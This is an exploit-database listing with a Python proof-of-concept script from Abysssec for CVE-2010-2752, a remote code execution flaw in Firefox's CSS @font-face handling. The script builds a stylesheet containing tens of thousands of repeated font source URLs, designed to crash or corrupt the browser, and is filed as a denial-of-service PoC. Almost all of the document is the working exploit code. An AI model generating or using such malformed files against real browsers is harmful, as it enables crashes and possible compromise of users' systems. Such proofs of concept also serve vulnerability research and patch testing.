Lucene search

K
zdtAbysssec1337DAY-ID-14208
HistorySep 26, 2010 - 12:00 a.m.

Mozilla Firefox CSS font-face Remote Code Execution Vulnerability

2010-09-2600:00:00
Abysssec
0day.today
15

Exploit for windows platform in category dos / poc

=================================================================
Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
=================================================================

  Title             :  Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
  Version           :  Firefox
  Analysis          :  http://www.abysssec.com
  Vendor            :  http://www.mozilla.com
  Impact            :  Crirical
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-2752
   
'''
 
import sys;
 
myStyle = """
  @font-face {
    font-family: Sean;
    font-style:  normal;
    font-weight: normal;
    src: url(SEAN1.eot);
    src: url('type/filename.woff') format('woff')
 
"""
i=0
while(i<50000):
    myStyle = myStyle + ",url('type/filename.otf') format('opentype')\n";
    i=i+1
 
myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n";
myStyle = myStyle + "}\n";
cssFile = open("style2.css","w")
cssFile.write(myStyle)
cssFile.close()



#  0day.today [2018-03-12]  #